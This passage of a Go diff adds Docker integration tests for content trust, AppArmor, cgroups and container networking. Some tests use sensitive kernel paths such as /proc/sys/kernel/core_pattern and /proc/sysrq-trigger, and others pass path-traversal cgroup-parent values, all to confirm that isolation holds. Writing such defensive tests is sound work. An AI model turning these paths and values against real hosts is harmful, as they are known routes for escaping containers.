These files have been + * picked to be checked as they are particularly sensitive to writes */ + "/proc/sys/kernel/modprobe", + "/proc/sys/kernel/core_pattern", + "/proc/sysrq-trigger", + "/proc/kcore", + } + for i, filePath := range testWritePaths { + name := fmt.Sprintf("writeprocsieve-%d", i) + + shellCmd := fmt.Sprintf("exec 3>%s", filePath) + out, code, err := dockerCmdWithError("run", "--privileged", "--security-opt", "apparmor=docker-default", "--name", name, "busybox", "sh", "-c", shellCmd) + if code != 0 { + return + } + if err != nil { + c.Fatalf("Open FD for write should have failed with permission denied, got: %s, %v", out, err) + } + } +} + +func (s *DockerSuite) TestRunNetworkFilesBindMount(c *check.C) { + // Not applicable on Windows as uses Unix specific functionality + testRequires(c, SameHostDaemon, DaemonIsLinux) + + expected := "test123" + + filename := createTmpFile(c, expected) + defer os.Remove(filename) + + nwfiles := []string{"/etc/resolv.conf", "/etc/hosts", "/etc/hostname"} + + for i := range nwfiles { + actual, _ := dockerCmd(c, "run", "-v", filename+":"+nwfiles[i], "busybox", "cat", nwfiles[i]) + if actual != expected { + c.Fatalf("expected %s be: %q, but was: %q", nwfiles[i], expected, actual) + } + } +} + +func (s *DockerSuite) TestRunNetworkFilesBindMountRO(c *check.C) { + // Not applicable on Windows as uses Unix specific functionality + testRequires(c, SameHostDaemon, DaemonIsLinux) + + filename := createTmpFile(c, "test123") + defer os.Remove(filename) + + nwfiles := []string{"/etc/resolv.conf", "/etc/hosts", "/etc/hostname"} + + for i := range nwfiles { + _, exitCode, err := dockerCmdWithError("run", "-v", filename+":"+nwfiles[i]+":ro", "busybox", "touch", nwfiles[i]) + if err == nil || exitCode == 0 { + c.Fatalf("run should fail because bind mount of %s is ro: exit code %d", nwfiles[i], exitCode) + } + } +} + +func (s *DockerSuite) TestRunNetworkFilesBindMountROFilesystem(c *check.C) { + // Not applicable on Windows as uses Unix 
specific functionality + testRequires(c, SameHostDaemon, DaemonIsLinux, UserNamespaceROMount) + + filename := createTmpFile(c, "test123") + defer os.Remove(filename) + + nwfiles := []string{"/etc/resolv.conf", "/etc/hosts", "/etc/hostname"} + + for i := range nwfiles { + _, exitCode := dockerCmd(c, "run", "-v", filename+":"+nwfiles[i], "--read-only", "busybox", "touch", nwfiles[i]) + if exitCode != 0 { + c.Fatalf("run should not fail because %s is mounted writable on read-only root filesystem: exit code %d", nwfiles[i], exitCode) + } + } + + for i := range nwfiles { + _, exitCode, err := dockerCmdWithError("run", "-v", filename+":"+nwfiles[i]+":ro", "--read-only", "busybox", "touch", nwfiles[i]) + if err == nil || exitCode == 0 { + c.Fatalf("run should fail because %s is mounted read-only on read-only root filesystem: exit code %d", nwfiles[i], exitCode) + } + } +} + +func (s *DockerTrustSuite) TestTrustedRun(c *check.C) { + // Windows does not support this functionality + testRequires(c, DaemonIsLinux) + repoName := s.setupTrustedImage(c, "trusted-run") + + // Try run + runCmd := exec.Command(dockerBinary, "run", repoName) + s.trustedCmd(runCmd) + out, _, err := runCommandWithOutput(runCmd) + if err != nil { + c.Fatalf("Error running trusted run: %s\n%s\n", err, out) + } + + if !strings.Contains(string(out), "Tagging") { + c.Fatalf("Missing expected output on trusted push:\n%s", out) + } + + dockerCmd(c, "rmi", repoName) + + // Try untrusted run to ensure we pushed the tag to the registry + runCmd = exec.Command(dockerBinary, "run", "--disable-content-trust=true", repoName) + s.trustedCmd(runCmd) + out, _, err = runCommandWithOutput(runCmd) + if err != nil { + c.Fatalf("Error running trusted run: %s\n%s", err, out) + } + + if !strings.Contains(string(out), "Status: Downloaded") { + c.Fatalf("Missing expected output on trusted run with --disable-content-trust:\n%s", out) + } +} + +func (s *DockerTrustSuite) TestUntrustedRun(c *check.C) { + // Windows does not 
support this functionality + testRequires(c, DaemonIsLinux) + repoName := fmt.Sprintf("%v/dockercliuntrusted/runtest:latest", privateRegistryURL) + // tag the image and upload it to the private registry + dockerCmd(c, "tag", "busybox", repoName) + dockerCmd(c, "push", repoName) + dockerCmd(c, "rmi", repoName) + + // Try trusted run on untrusted tag + runCmd := exec.Command(dockerBinary, "run", repoName) + s.trustedCmd(runCmd) + out, _, err := runCommandWithOutput(runCmd) + if err == nil { + c.Fatalf("Error expected when running trusted run with:\n%s", out) + } + + if !strings.Contains(string(out), "does not have trust data for") { + c.Fatalf("Missing expected output on trusted run:\n%s", out) + } +} + +func (s *DockerTrustSuite) TestRunWhenCertExpired(c *check.C) { + // Windows does not support this functionality + testRequires(c, DaemonIsLinux) + c.Skip("Currently changes system time, causing instability") + repoName := s.setupTrustedImage(c, "trusted-run-expired") + + // Certificates have 10 years of expiration + elevenYearsFromNow := time.Now().Add(time.Hour * 24 * 365 * 11) + + runAtDifferentDate(elevenYearsFromNow, func() { + // Try run + runCmd := exec.Command(dockerBinary, "run", repoName) + s.trustedCmd(runCmd) + out, _, err := runCommandWithOutput(runCmd) + if err == nil { + c.Fatalf("Error running trusted run in the distant future: %s\n%s", err, out) + } + + if !strings.Contains(string(out), "could not validate the path to a trusted root") { + c.Fatalf("Missing expected output on trusted run in the distant future:\n%s", out) + } + }) + + runAtDifferentDate(elevenYearsFromNow, func() { + // Try run + runCmd := exec.Command(dockerBinary, "run", "--disable-content-trust", repoName) + s.trustedCmd(runCmd) + out, _, err := runCommandWithOutput(runCmd) + if err != nil { + c.Fatalf("Error running untrusted run in the distant future: %s\n%s", err, out) + } + + if !strings.Contains(string(out), "Status: Downloaded") { + c.Fatalf("Missing expected output on 
untrusted run in the distant future:\n%s", out) + } + }) +} + +func (s *DockerTrustSuite) TestTrustedRunFromBadTrustServer(c *check.C) { + // Windows does not support this functionality + testRequires(c, DaemonIsLinux) + repoName := fmt.Sprintf("%v/dockerclievilrun/trusted:latest", privateRegistryURL) + evilLocalConfigDir, err := ioutil.TempDir("", "evilrun-local-config-dir") + if err != nil { + c.Fatalf("Failed to create local temp dir") + } + + // tag the image and upload it to the private registry + dockerCmd(c, "tag", "busybox", repoName) + + pushCmd := exec.Command(dockerBinary, "push", repoName) + s.trustedCmd(pushCmd) + out, _, err := runCommandWithOutput(pushCmd) + if err != nil { + c.Fatalf("Error running trusted push: %s\n%s", err, out) + } + if !strings.Contains(string(out), "Signing and pushing trust metadata") { + c.Fatalf("Missing expected output on trusted push:\n%s", out) + } + + dockerCmd(c, "rmi", repoName) + + // Try run + runCmd := exec.Command(dockerBinary, "run", repoName) + s.trustedCmd(runCmd) + out, _, err = runCommandWithOutput(runCmd) + if err != nil { + c.Fatalf("Error running trusted run: %s\n%s", err, out) + } + + if !strings.Contains(string(out), "Tagging") { + c.Fatalf("Missing expected output on trusted push:\n%s", out) + } + + dockerCmd(c, "rmi", repoName) + + // Kill the notary server, start a new "evil" one. + s.not.Close() + s.not, err = newTestNotary(c) + if err != nil { + c.Fatalf("Restarting notary server failed.") + } + + // In order to make an evil server, lets re-init a client (with a different trust dir) and push new data. 
+ // tag an image and upload it to the private registry + dockerCmd(c, "--config", evilLocalConfigDir, "tag", "busybox", repoName) + + // Push up to the new server + pushCmd = exec.Command(dockerBinary, "--config", evilLocalConfigDir, "push", repoName) + s.trustedCmd(pushCmd) + out, _, err = runCommandWithOutput(pushCmd) + if err != nil { + c.Fatalf("Error running trusted push: %s\n%s", err, out) + } + if !strings.Contains(string(out), "Signing and pushing trust metadata") { + c.Fatalf("Missing expected output on trusted push:\n%s", out) + } + + // Now, try running with the original client from this new trust server. This should fail because the new root is invalid. + runCmd = exec.Command(dockerBinary, "run", repoName) + s.trustedCmd(runCmd) + out, _, err = runCommandWithOutput(runCmd) + + if err == nil { + c.Fatalf("Continuing with cached data even though it's an invalid root rotation: %s\n%s", err, out) + } + if !strings.Contains(out, "could not rotate trust to a new trusted root") { + c.Fatalf("Missing expected output on trusted run:\n%s", out) + } +} + +func (s *DockerSuite) TestPtraceContainerProcsFromHost(c *check.C) { + // Not applicable on Windows as uses Unix specific functionality + testRequires(c, DaemonIsLinux, SameHostDaemon) + + out, _ := dockerCmd(c, "run", "-d", "busybox", "top") + id := strings.TrimSpace(out) + c.Assert(waitRun(id), check.IsNil) + pid1 := inspectField(c, id, "State.Pid") + + _, err := os.Readlink(fmt.Sprintf("/proc/%s/ns/net", pid1)) + if err != nil { + c.Fatal(err) + } +} + +func (s *DockerSuite) TestAppArmorDeniesPtrace(c *check.C) { + // Not applicable on Windows as uses Unix specific functionality + testRequires(c, SameHostDaemon, Apparmor, DaemonIsLinux) + + // Run through 'sh' so we are NOT pid 1. Pid 1 may be able to trace + // itself, but pid>1 should not be able to trace pid1. 
+ _, exitCode, _ := dockerCmdWithError("run", "busybox", "sh", "-c", "sh -c readlink /proc/1/ns/net") + if exitCode == 0 { + c.Fatal("ptrace was not successfully restricted by AppArmor") + } +} + +func (s *DockerSuite) TestAppArmorTraceSelf(c *check.C) { + // Not applicable on Windows as uses Unix specific functionality + testRequires(c, DaemonIsLinux, SameHostDaemon, Apparmor) + + _, exitCode, _ := dockerCmdWithError("run", "busybox", "readlink", "/proc/1/ns/net") + if exitCode != 0 { + c.Fatal("ptrace of self failed.") + } +} + +func (s *DockerSuite) TestAppArmorDeniesChmodProc(c *check.C) { + // Not applicable on Windows as uses Unix specific functionality + testRequires(c, SameHostDaemon, Apparmor, DaemonIsLinux, NotUserNamespace) + _, exitCode, _ := dockerCmdWithError("run", "busybox", "chmod", "744", "/proc/cpuinfo") + if exitCode == 0 { + // If our test failed, attempt to repair the host system... + _, exitCode, _ := dockerCmdWithError("run", "busybox", "chmod", "444", "/proc/cpuinfo") + if exitCode == 0 { + c.Fatal("AppArmor was unsuccessful in prohibiting chmod of /proc/* files.") + } + } +} + +func (s *DockerSuite) TestRunCapAddSYSTIME(c *check.C) { + // Not applicable on Windows as uses Unix specific functionality + testRequires(c, DaemonIsLinux) + + dockerCmd(c, "run", "--cap-drop=ALL", "--cap-add=SYS_TIME", "busybox", "sh", "-c", "grep ^CapEff /proc/self/status | sed 's/^CapEff:\t//' | grep ^0000000002000000$") +} + +// run create container failed should clean up the container +func (s *DockerSuite) TestRunCreateContainerFailedCleanUp(c *check.C) { + // TODO Windows. 
This may be possible to enable once link is supported + testRequires(c, DaemonIsLinux) + name := "unique_name" + _, _, err := dockerCmdWithError("run", "--name", name, "--link", "nothing:nothing", "busybox") + c.Assert(err, check.NotNil, check.Commentf("Expected docker run to fail!")) + + containerID, err := inspectFieldWithError(name, "Id") + c.Assert(err, checker.NotNil, check.Commentf("Expected not to have this container: %s!", containerID)) + c.Assert(containerID, check.Equals, "", check.Commentf("Expected not to have this container: %s!", containerID)) +} + +func (s *DockerSuite) TestRunNamedVolume(c *check.C) { + prefix, _ := getPrefixAndSlashFromDaemonPlatform() + testRequires(c, DaemonIsLinux) + dockerCmd(c, "run", "--name=test", "-v", "testing:"+prefix+"/foo", "busybox", "sh", "-c", "echo hello > "+prefix+"/foo/bar") + + out, _ := dockerCmd(c, "run", "--volumes-from", "test", "busybox", "sh", "-c", "cat "+prefix+"/foo/bar") + c.Assert(strings.TrimSpace(out), check.Equals, "hello") + + out, _ = dockerCmd(c, "run", "-v", "testing:"+prefix+"/foo", "busybox", "sh", "-c", "cat "+prefix+"/foo/bar") + c.Assert(strings.TrimSpace(out), check.Equals, "hello") +} + +func (s *DockerSuite) TestRunWithUlimits(c *check.C) { + // Not applicable on Windows as uses Unix specific functionality + testRequires(c, DaemonIsLinux) + + out, _ := dockerCmd(c, "run", "--name=testulimits", "--ulimit", "nofile=42", "busybox", "/bin/sh", "-c", "ulimit -n") + ul := strings.TrimSpace(out) + if ul != "42" { + c.Fatalf("expected `ulimit -n` to be 42, got %s", ul) + } +} + +func (s *DockerSuite) TestRunContainerWithCgroupParent(c *check.C) { + // Not applicable on Windows as uses Unix specific functionality + testRequires(c, DaemonIsLinux) + + cgroupParent := "test" + name := "cgroup-test" + + out, _, err := dockerCmdWithError("run", "--cgroup-parent", cgroupParent, "--name", name, "busybox", "cat", "/proc/self/cgroup") + if err != nil { + c.Fatalf("unexpected failure when running container 
with --cgroup-parent option - %s\n%v", string(out), err) + } + cgroupPaths := parseCgroupPaths(string(out)) + if len(cgroupPaths) == 0 { + c.Fatalf("unexpected output - %q", string(out)) + } + id, err := getIDByName(name) + c.Assert(err, check.IsNil) + expectedCgroup := path.Join(cgroupParent, id) + found := false + for _, path := range cgroupPaths { + if strings.HasSuffix(path, expectedCgroup) { + found = true + break + } + } + if !found { + c.Fatalf("unexpected cgroup paths. Expected at least one cgroup path to have suffix %q. Cgroup Paths: %v", expectedCgroup, cgroupPaths) + } +} + +func (s *DockerSuite) TestRunContainerWithCgroupParentAbsPath(c *check.C) { + // Not applicable on Windows as uses Unix specific functionality + testRequires(c, DaemonIsLinux) + + cgroupParent := "/cgroup-parent/test" + name := "cgroup-test" + out, _, err := dockerCmdWithError("run", "--cgroup-parent", cgroupParent, "--name", name, "busybox", "cat", "/proc/self/cgroup") + if err != nil { + c.Fatalf("unexpected failure when running container with --cgroup-parent option - %s\n%v", string(out), err) + } + cgroupPaths := parseCgroupPaths(string(out)) + if len(cgroupPaths) == 0 { + c.Fatalf("unexpected output - %q", string(out)) + } + id, err := getIDByName(name) + c.Assert(err, check.IsNil) + expectedCgroup := path.Join(cgroupParent, id) + found := false + for _, path := range cgroupPaths { + if strings.HasSuffix(path, expectedCgroup) { + found = true + break + } + } + if !found { + c.Fatalf("unexpected cgroup paths. Expected at least one cgroup path to have suffix %q. Cgroup Paths: %v", expectedCgroup, cgroupPaths) + } +} + +// TestRunInvalidCgroupParent checks that a specially-crafted cgroup parent doesn't cause Docker to crash or start modifying /. 
+func (s *DockerSuite) TestRunInvalidCgroupParent(c *check.C) { + // Not applicable on Windows as uses Unix specific functionality + testRequires(c, DaemonIsLinux) + + cgroupParent := "../../../../../../../../SHOULD_NOT_EXIST" + cleanCgroupParent := "SHOULD_NOT_EXIST" + name := "cgroup-invalid-test" + + out, _, err := dockerCmdWithError("run", "--cgroup-parent", cgroupParent, "--name", name, "busybox", "cat", "/proc/self/cgroup") + if err != nil { + // XXX: This may include a daemon crash. + c.Fatalf("unexpected failure when running container with --cgroup-parent option - %s\n%v", string(out), err) + } + + // We expect "/SHOULD_NOT_EXIST" to not exist. If not, we have a security issue. + if _, err := os.Stat("/SHOULD_NOT_EXIST"); err == nil || !os.IsNotExist(err) { + c.Fatalf("SECURITY: --cgroup-parent with ../../ relative paths cause files to be created in the host (this is bad) !!") + } + + cgroupPaths := parseCgroupPaths(string(out)) + if len(cgroupPaths) == 0 { + c.Fatalf("unexpected output - %q", string(out)) + } + id, err := getIDByName(name) + c.Assert(err, check.IsNil) + expectedCgroup := path.Join(cleanCgroupParent, id) + found := false + for _, path := range cgroupPaths { + if strings.HasSuffix(path, expectedCgroup) { + found = true + break + } + } + if !found { + c.Fatalf("unexpected cgroup paths. Expected at least one cgroup path to have suffix %q. Cgroup Paths: %v", expectedCgroup, cgroupPaths) + } +} + +// TestRunInvalidCgroupParent checks that a specially-crafted cgroup parent doesn't cause Docker to crash or start modifying /. 
+func (s *DockerSuite) TestRunAbsoluteInvalidCgroupParent(c *check.C) { + // Not applicable on Windows as uses Unix specific functionality + testRequires(c, DaemonIsLinux) + + cgroupParent := "/../../../../../../../../SHOULD_NOT_EXIST" + cleanCgroupParent := "/SHOULD_NOT_EXIST" + name := "cgroup-absolute-invalid-test" + + out, _, err := dockerCmdWithError("run", "--cgroup-parent", cgroupParent, "--name", name, "busybox", "cat", "/proc/self/cgroup") + if err != nil { + // XXX: This may include a daemon crash. + c.Fatalf("unexpected failure when running container with --cgroup-parent option - %s\n%v", string(out), err) + } + + // We expect "/SHOULD_NOT_EXIST" to not exist. If not, we have a security issue. + if _, err := os.Stat("/SHOULD_NOT_EXIST"); err == nil || !os.IsNotExist(err) { + c.Fatalf("SECURITY: --cgroup-parent with /../../ garbage paths cause files to be created in the host (this is bad) !!") + } + + cgroupPaths := parseCgroupPaths(string(out)) + if len(cgroupPaths) == 0 { + c.Fatalf("unexpected output - %q", string(out)) + } + id, err := getIDByName(name) + c.Assert(err, check.IsNil) + expectedCgroup := path.Join(cleanCgroupParent, id) + found := false + for _, path := range cgroupPaths { + if strings.HasSuffix(path, expectedCgroup) { + found = true + break + } + } + if !found { + c.Fatalf("unexpected cgroup paths. Expected at least one cgroup path to have suffix %q. 
Cgroup Paths: %v", expectedCgroup, cgroupPaths) + } +} + +func (s *DockerSuite) TestRunContainerWithCgroupMountRO(c *check.C) { + // Not applicable on Windows as uses Unix specific functionality + // --read-only + userns has remount issues + testRequires(c, DaemonIsLinux, NotUserNamespace) + + filename := "/sys/fs/cgroup/devices/test123" + out, _, err := dockerCmdWithError("run", "busybox", "touch", filename) + if err == nil { + c.Fatal("expected cgroup mount point to be read-only, touch file should fail") + } + expected := "Read-only file system" + if !strings.Contains(out, expected) { + c.Fatalf("expected output from failure to contain %s but contains %s", expected, out) + } +} + +func (s *DockerSuite) TestRunContainerNetworkModeToSelf(c *check.C) { + // Not applicable on Windows which does not support --net=container + testRequires(c, DaemonIsLinux) + out, _, err := dockerCmdWithError("run", "--name=me", "--net=container:me", "busybox", "true") + if err == nil || !strings.Contains(out, "cannot join own network") { + c.Fatalf("using container net mode to self should result in an error\nerr: %q\nout: %s", err, out) + } +} + +func (s *DockerSuite) TestRunContainerNetModeWithDNSMacHosts(c *check.C) { + // Not applicable on Windows which does not support --net=container + testRequires(c, DaemonIsLinux) + out, _, err := dockerCmdWithError("run", "-d", "--name", "parent", "busybox", "top") + if err != nil { + c.Fatalf("failed to run container: %v, output: %q", err, out) + } + + out, _, err = dockerCmdWithError("run", "--dns", "1.2.3.4", "--net=container:parent", "busybox") + if err == nil || !strings.Contains(out, runconfig.ErrConflictNetworkAndDNS.Error()) { + c.Fatalf("run --net=container with --dns should error out") + } + + out, _, err = dockerCmdWithError("run", "--mac-address", "92:d0:c6:0a:29:33", "--net=container:parent", "busybox") + if err == nil || !strings.Contains(out, runconfig.ErrConflictContainerNetworkAndMac.Error()) { + c.Fatalf("run --net=container 
with --mac-address should error out") + } + + out, _, err = dockerCmdWithError("run", "--add-host", "test:192.168.2.109", "--net=container:parent", "busybox") + if err == nil || !strings.Contains(out, runconfig.ErrConflictNetworkHosts.Error()) { + c.Fatalf("run --net=container with --add-host should error out") + } +} + +func (s *DockerSuite) TestRunContainerNetModeWithExposePort(c *check.C) { + // Not applicable on Windows which does not support --net=container + testRequires(c, DaemonIsLinux) + dockerCmd(c, "run", "-d", "--name", "parent", "busybox", "top") + + out, _, err := dockerCmdWithError("run", "-p", "5000:5000", "--net=container:parent", "busybox") + if err == nil || !strings.Contains(out, runconfig.ErrConflictNetworkPublishPorts.Error()) { + c.Fatalf("run --net=container with -p should error out") + } + + out, _, err = dockerCmdWithError("run", "-P", "--net=container:parent", "busybox") + if err == nil || !strings.Contains(out, runconfig.ErrConflictNetworkPublishPorts.Error()) { + c.Fatalf("run --net=container with -P should error out") + } + + out, _, err = dockerCmdWithError("run", "--expose", "5000", "--net=container:parent", "busybox") + if err == nil || !strings.Contains(out, runconfig.ErrConflictNetworkExposePorts.Error()) { + c.Fatalf("run --net=container with --expose should error out") + } +} + +func (s *DockerSuite) TestRunLinkToContainerNetMode(c *check.C) { + // Not applicable on Windows which does not support --net=container or --link + testRequires(c, DaemonIsLinux) + dockerCmd(c, "run", "--name", "test", "-d", "busybox", "top") + dockerCmd(c, "run", "--name", "parent", "-d", "--net=container:test", "busybox", "top") + dockerCmd(c, "run", "-d", "--link=parent:parent", "busybox", "top") + dockerCmd(c, "run", "--name", "child", "-d", "--net=container:parent", "busybox", "top") + dockerCmd(c, "run", "-d", "--link=child:child", "busybox", "top") +} + +func (s *DockerSuite) TestRunLoopbackOnlyExistsWhenNetworkingDisabled(c *check.C) { + // TODO 
Windows: This may be possible to convert. + testRequires(c, DaemonIsLinux) + out, _ := dockerCmd(c, "run", "--net=none", "busybox", "ip", "-o", "-4", "a", "show", "up") + + var ( + count = 0 + parts = strings.Split(out, "\n") + ) + + for _, l := range parts { + if l != "" { + count++ + } + } + + if count != 1 { + c.Fatalf("Wrong interface count in container %d", count) + } + + if !strings.HasPrefix(out, "1: lo") { + c.Fatalf("Wrong interface in test container: expected [1: lo], got %s", out) + } +} + +// Issue #4681 +func (s *DockerSuite) TestRunLoopbackWhenNetworkDisabled(c *check.C) { + if daemonPlatform == "windows" { + dockerCmd(c, "run", "--net=none", WindowsBaseImage, "ping", "-n", "1", "127.0.0.1") + } else { + dockerCmd(c, "run", "--net=none", "busybox", "ping", "-c", "1", "127.0.0.1") + } +} + +func (s *DockerSuite) TestRunModeNetContainerHostname(c *check.C) { + // Windows does not support --net=container + testRequires(c, DaemonIsLinux, ExecSupport) + + dockerCmd(c, "run", "-i", "-d", "--name", "parent", "busybox", "top") + out, _ := dockerCmd(c, "exec", "parent", "cat", "/etc/hostname") + out1, _ := dockerCmd(c, "run", "--net=container:parent", "busybox", "cat", "/etc/hostname") + + if out1 != out { + c.Fatal("containers with shared net namespace should have same hostname") + } +} + +func (s *DockerSuite) TestRunNetworkNotInitializedNoneMode(c *check.C) { + // TODO Windows: Network settings are not currently propagated. This may + // be resolved in the future with the move to libnetwork and CNM. 
+ testRequires(c, DaemonIsLinux) + out, _ := dockerCmd(c, "run", "-d", "--net=none", "busybox", "top") + id := strings.TrimSpace(out) + res := inspectField(c, id, "NetworkSettings.Networks.none.IPAddress") + if res != "" { + c.Fatalf("For 'none' mode network must not be initialized, but container got IP: %s", res) + } +} + +func (s *DockerSuite) TestTwoContainersInNetHost(c *check.C) { + // Not applicable as Windows does not support --net=host + testRequires(c, DaemonIsLinux, NotUserNamespace, NotUserNamespace) + dockerCmd(c, "run", "-d", "--net=host", "--name=first", "busybox", "top") + dockerCmd(c, "run", "-d", "--net=host", "--name=second", "busybox", "top") + dockerCmd(c, "stop", "first") + dockerCmd(c, "stop", "second") +} + +func (s *DockerSuite) TestContainersInUserDefinedNetwork(c *check.C) { + testRequires(c, DaemonIsLinux, NotUserNamespace, NotArm) + dockerCmd(c, "network", "create", "-d", "bridge", "testnetwork") + dockerCmd(c, "run", "-d", "--net=testnetwork", "--name=first", "busybox", "top") + c.Assert(waitRun("first"), check.IsNil) + dockerCmd(c, "run", "-t", "--net=testnetwork", "--name=second", "busybox", "ping", "-c", "1", "first") +} + +func (s *DockerSuite) TestContainersInMultipleNetworks(c *check.C) { + testRequires(c, DaemonIsLinux, NotUserNamespace, NotArm) + // Create 2 networks using bridge driver + dockerCmd(c, "network", "create", "-d", "bridge", "testnetwork1") + dockerCmd(c, "network", "create", "-d", "bridge", "testnetwork2") + // Run and connect containers to testnetwork1 + dockerCmd(c, "run", "-d", "--net=testnetwork1", "--name=first", "busybox", "top") + c.Assert(waitRun("first"), check.IsNil) + dockerCmd(c, "run", "-d", "--net=testnetwork1", "--name=second", "busybox", "top") + c.Assert(waitRun("second"), check.IsNil) + // Check connectivity between containers in testnetwork2 + dockerCmd(c, "exec", "first", "ping", "-c", "1", "second.testnetwork1") + // Connect containers to testnetwork2 + dockerCmd(c, "network", "connect", 
"testnetwork2", "first") + dockerCmd(c, "network", "connect", "testnetwork2", "second") + // Check connectivity between containers + dockerCmd(c, "exec", "second", "ping", "-c", "1", "first.testnetwork2") +} + +func (s *DockerSuite) TestContainersNetworkIsolation(c *check.C) { + testRequires(c, DaemonIsLinux, NotUserNamespace, NotArm) + // Create 2 networks using bridge driver + dockerCmd(c, "network", "create", "-d", "bridge", "testnetwork1") + dockerCmd(c, "network", "create", "-d", "bridge", "testnetwork2") + // Run 1 container in testnetwork1 and another in testnetwork2 + dockerCmd(c, "run", "-d", "--net=testnetwork1", "--name=first", "busybox", "top") + c.Assert(waitRun("first"), check.IsNil) + dockerCmd(c, "run", "-d", "--net=testnetwork2", "--name=second", "busybox", "top") + c.Assert(waitRun("second"), check.IsNil) + + // Check Isolation between containers : ping must fail + _, _, err := dockerCmdWithError("exec", "first", "ping", "-c", "1", "second") + c.Assert(err, check.NotNil) + // Connect first container to testnetwork2 + dockerCmd(c, "network", "connect", "testnetwork2", "first") + // ping must succeed now + _, _, err = dockerCmdWithError("exec", "first", "ping", "-c", "1", "second") + c.Assert(err, check.IsNil) + + // Disconnect first container from testnetwork2 + dockerCmd(c, "network", "disconnect", "testnetwork2", "first") + // ping must fail again + _, _, err = dockerCmdWithError("exec", "first", "ping", "-c", "1", "second") + c.Assert(err, check.NotNil) +} + +func (s *DockerSuite) TestNetworkRmWithActiveContainers(c *check.C) { + testRequires(c, DaemonIsLinux, NotUserNamespace) + // Create 2 networks using bridge driver + dockerCmd(c, "network", "create", "-d", "bridge", "testnetwork1") + // Run and connect containers to testnetwork1 + dockerCmd(c, "run", "-d", "--net=testnetwork1", "--name=first", "busybox", "top") + c.Assert(waitRun("first"), check.IsNil) + dockerCmd(c, "run", "-d", "--net=testnetwork1", "--name=second", "busybox", "top") + 
c.Assert(waitRun("second"), check.IsNil) + // Network delete with active containers must fail + _, _, err := dockerCmdWithError("network", "rm", "testnetwork1") + c.Assert(err, check.NotNil) + + dockerCmd(c, "stop", "first") + _, _, err = dockerCmdWithError("network", "rm", "testnetwork1") + c.Assert(err, check.NotNil) +} + +func (s *DockerSuite) TestContainerRestartInMultipleNetworks(c *check.C) { + testRequires(c, DaemonIsLinux, NotUserNamespace, NotArm) + // Create 2 networks using bridge driver + dockerCmd(c, "network", "create", "-d", "bridge", "testnetwork1") + dockerCmd(c, "network", "create", "-d", "bridge", "testnetwork2") + + // Run and connect containers to testnetwork1 + dockerCmd(c, "run", "-d", "--net=testnetwork1", "--name=first", "busybox", "top") + c.Assert(waitRun("first"), check.IsNil) + dockerCmd(c, "run", "-d", "--net=testnetwork1", "--name=second", "busybox", "top") + c.Assert(waitRun("second"), check.IsNil) + // Check connectivity between containers in testnetwork1 + dockerCmd(c, "exec", "first", "ping", "-c", "1", "second.testnetwork1") + // Connect containers to testnetwork2 + dockerCmd(c, "network", "connect", "testnetwork2", "first") + dockerCmd(c, "network", "connect", "testnetwork2", "second") + // Check connectivity between containers + dockerCmd(c, "exec", "second", "ping", "-c", "1", "first.testnetwork2") + + // Stop second container and test ping failures on both networks + dockerCmd(c, "stop", "second") + _, _, err := dockerCmdWithError("exec", "first", "ping", "-c", "1", "second.testnetwork1") + c.Assert(err, check.NotNil) + _, _, err = dockerCmdWithError("exec", "first", "ping", "-c", "1", "second.testnetwork2") + c.Assert(err, check.NotNil) + + // Start second container and connectivity must be restored on both networks + dockerCmd(c, "start", "second") + dockerCmd(c, "exec", "first", "ping", "-c", "1", "second.testnetwork1") + dockerCmd(c, "exec", "second", "ping", "-c", "1", "first.testnetwork2") +} + +func (s *DockerSuite) 
TestContainerWithConflictingHostNetworks(c *check.C) { + testRequires(c, DaemonIsLinux, NotUserNamespace) + // Run a container with --net=host + dockerCmd(c, "run", "-d", "--net=host", "--name=first", "busybox", "top") + c.Assert(waitRun("first"), check.IsNil) + + // Create a network using bridge driver + dockerCmd(c, "network", "create", "-d", "bridge", "testnetwork1") + + // Connecting to the user defined network must fail + _, _, err := dockerCmdWithError("network", "connect", "testnetwork1", "first") + c.Assert(err, check.NotNil) +} + +func (s *DockerSuite) TestContainerWithConflictingSharedNetwork(c *check.C) { + testRequires(c, DaemonIsLinux) + dockerCmd(c, "run", "-d", "--name=first", "busybox", "top") + c.Assert(waitRun("first"), check.IsNil) + // Run second container in first container's network namespace + dockerCmd(c, "run", "-d", "--net=container:first", "--name=second", "busybox", "top") + c.Assert(waitRun("second"), check.IsNil) + + // Create a network using bridge driver + dockerCmd(c, "network", "create", "-d", "bridge", "testnetwork1") + + // Connecting to the user defined network must fail + out, _, err := dockerCmdWithError("network", "connect", "testnetwork1", "second") + c.Assert(err, check.NotNil) + c.Assert(out, checker.Contains, runconfig.ErrConflictSharedNetwork.Error()) +} + +func (s *DockerSuite) TestContainerWithConflictingNoneNetwork(c *check.C) { + testRequires(c, DaemonIsLinux) + dockerCmd(c, "run", "-d", "--net=none", "--name=first", "busybox", "top") + c.Assert(waitRun("first"), check.IsNil) + + // Create a network using bridge driver + dockerCmd(c, "network", "create", "-d", "bridge", "testnetwork1") + + // Connecting to the user defined network must fail + out, _, err := dockerCmdWithError("network", "connect", "testnetwork1", "first") + c.Assert(err, check.NotNil) + c.Assert(out, checker.Contains, runconfig.ErrConflictNoNetwork.Error()) + + // create a container connected to testnetwork1 + dockerCmd(c, "run", "-d", 
"--net=testnetwork1", "--name=second", "busybox", "top") + c.Assert(waitRun("second"), check.IsNil) + + // Connect second container to none network. it must fail as well + _, _, err = dockerCmdWithError("network", "connect", "none", "second") + c.Assert(err, check.NotNil) +} + +// #11957 - stdin with no tty does not exit if stdin is not closed even though container exited +func (s *DockerSuite) TestRunStdinBlockedAfterContainerExit(c *check.C) { + cmd := exec.Command(dockerBinary, "run", "-i", "--name=test", "busybox", "true") + in, err := cmd.StdinPipe() + c.Assert(err, check.IsNil) + defer in.Close() + stdout := bytes.NewBuffer(nil) + cmd.Stdout = stdout + cmd.Stderr = stdout + c.Assert(cmd.Start(), check.IsNil) + + waitChan := make(chan error) + go func() { + waitChan <- cmd.Wait() + }() + + select { + case err := <-waitChan: + c.Assert(err, check.IsNil, check.Commentf(stdout.String())) + case <-time.After(30 * time.Second): + c.Fatal("timeout waiting for command to exit") + } +} + +func (s *DockerSuite) TestRunWrongCpusetCpusFlagValue(c *check.C) { + // TODO Windows: This needs validation (error out) in the daemon. + testRequires(c, DaemonIsLinux) + out, exitCode, err := dockerCmdWithError("run", "--cpuset-cpus", "1-10,11--", "busybox", "true") + c.Assert(err, check.NotNil) + expected := "Error response from daemon: Invalid value 1-10,11-- for cpuset cpus.\n" + if !(strings.Contains(out, expected) || exitCode == 125) { + c.Fatalf("Expected output to contain %q with exitCode 125, got out: %q exitCode: 